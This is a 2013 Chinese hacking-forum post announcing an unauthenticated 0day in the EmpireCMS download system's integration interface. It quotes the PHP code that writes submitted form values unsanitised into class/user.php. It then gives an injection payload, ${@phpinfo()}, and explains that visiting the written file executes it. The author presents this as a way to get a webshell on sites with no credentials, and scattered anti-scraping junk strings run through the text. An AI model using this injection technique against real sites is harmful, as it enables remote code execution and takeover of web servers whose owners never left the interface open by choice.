找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2440|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
( B8 }  V$ Q* R6 \4 n% A
. m( ]6 Q) v2 G

$ b' R% @" F% d, u# }
这是帝国的一套下载系统 如图
( n$ ^7 n9 Q% i7 J: C; ~5 sps(不需要任何账户和密码,直接写shell)

( K2 U3 n  p' F3 s

由于很多站是由于下载要整合discuz 等等一些论坛....3 Z; X8 U/ V" M- w5 t6 y

7 D1 @) |' h) {% y( T! k! `$ W6 m/ I! j

而帝国他又有一个万能接口,如图


  a& v  y; |: S) {$ ?; f
# c6 M! f9 n% m% `5 f' T3 [4 N) j9 Y9 a. H9 S  M

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码; ?4 C% R* C! l  `
5 d4 [# G1 n% K% p
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪  |* j& c2 J/ ?1 y$ E& ^
  D7 ~' S: J! _' g, r: t+ {8 `
在data/fun.php中的15行
4 [3 U0 l( o: a7 [( b* i$ _4 @7 G: M2 U- @; J0 C4 [
我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
& O+ h3 e4 N& b$ r0 o
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干
/ r: v& P/ L9 S0 z: L
+ K# v- r3 R' c+ l( ]/ L) K这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);! n' _8 t- Y3 J

% ]  [9 K. D6 z0 ~  \1 i他将传进来的变量进行了切割,然后赋给了$filetext
- W8 d9 j) c+ f3 c7 L8 Z/ {7 Q! N  T8 Z. c1 o
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
, {' j# R$ T+ `+ q$ J; a
6 b, a% b0 y: b  Y我们看看写入的结果,随便填一个


. i2 L' h0 ~5 b0 Q' ]
3 r! e% j; J! E7 ]7 X5 ?9 T7 z; D7 B6 M  {- d7 K! z' N% I

$ i; l6 P. ^; j4 d0 x' y
- |6 |# U4 s) M  j
* z) J1 t- b% L/ D

5 Y8 R! k- z6 N& ?7 z& \" k$ t

% c6 p& `. S- a7 v- C/ u# X+ t9 T

' W- t$ B3 @. l: o5 Y, v3 ?' V1 A; [8 ?+ t" h9 \: q( M
# r7 W; r7 N5 E; H5 u# O; i; p
3 F; K: U, ~4 C( Z
0 J6 [+ c) j/ i( ^' G# L* P( I. |* ]
% H: c; E; j( y7 W! W  y
/ d* w; u0 H! y* J2 C+ f. i" N/ a

: G0 n5 U: Q4 W
! G% p5 S7 U3 g$ l& U9 E2 \  S4 `; x3 M) ~8 D% f6 ~

: h" z, P4 R$ @3 p* f
* [9 n, g1 E2 M9 O4 ]9 J
5 m- c! r/ E( ]

! n' t, |2 {- _  |. q7 Z% ^3 {4 J

所以我们淫荡点,写个${@phpinfo()}试试


) x* ~7 j& G9 A  Z' o

然后访问以下class/user.php这个文件7 C  l  c. G7 F: m' {
日了吧


6 |9 g- @  w( a% X
! K, Q' m: D% {+ h
5 \2 b; Y& Z9 m2 K

0 \0 w7 }. J! t$ w! F  i

1 N' y2 ^) R* m$ ]$ f8 `, v$ F+ Q# l

) f. D! k/ T8 t  H7 D

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表